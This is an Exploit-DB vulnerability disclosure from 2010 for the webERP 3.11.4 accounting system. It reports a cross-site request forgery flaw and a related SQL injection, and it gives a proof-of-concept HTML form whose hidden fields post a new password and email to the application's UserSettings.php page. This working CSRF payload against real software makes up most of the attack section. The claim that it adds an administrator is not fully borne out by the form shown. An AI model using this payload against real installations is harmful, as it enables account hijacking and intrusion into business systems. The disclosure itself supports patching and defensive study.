webERP 3.11.4 - Multiple Vulnerabilities

2010-06-30T00:00:00
ID EDB-ID:14132
Type exploitdb
Reporter ADEO Security
Modified 2010-06-30T00:00:00

Description

webERP v3.11.4 Multiple Vulnerabilities. Webapps exploit for php platform

                                        
                                            # Title: webERP Multiple Vulnerabilities
# Author: ADEO Security
# Published: 30/06/2010
# Version: 3.11.4 (Possible all versions)
# Vendor: http://www.weberp.org

# Description: "webERP is a complete web based accounting/ERP system
that requires only a web-browser and pdf reader to use. It has a wide
range of features suitable for many businesses particularly
distributed businesses in wholesale and distribution. It is developed
as an open-source application and is available as a free download to
use. The feature set is continually expanding as new businesses and
developers adopt it.There are on average 5,000 downloads per month."

# Credit: Vulnerability founded by Canberk BOLAT at ADEO Security Labs
- Mail: security[AT]adeo.com.tr
- Web: http://security.adeo.com.tr

# Vulnerabilities:
1) CSRF: Attacker can add new administrator to the system. All files
have this issue. See #PoC section.
2) SQL Injection: Application offer disable the magic_quotes_gpc.
Attacker can inject sql codes if exploit the CSRF vulnerability. HTTP
Requests must filtered.

# PoC (CSRF):
<html>
<body>
<form method="POST" action="http://server/UserSettings.php?">
<input type="hidden" name="RealName" VALUE="ADEO-Security">
<input type='hidden' name='DisplayRecordsMax' VALUE="10">
<input type='hidden' name='Language' VALUE='en_US'>
<input type='hidden' name='Theme' VALUE='green'>
<input type='hidden' name='pass' value='adeopass'>
<input type='hidden' name='passcheck' value='adeopass'>
<input type='hidden' name='email' size=40 value='hacked@weberp.org'>
<input type='hidden' name='Modify' value="Modify""></div>
</form>

</body>
</html>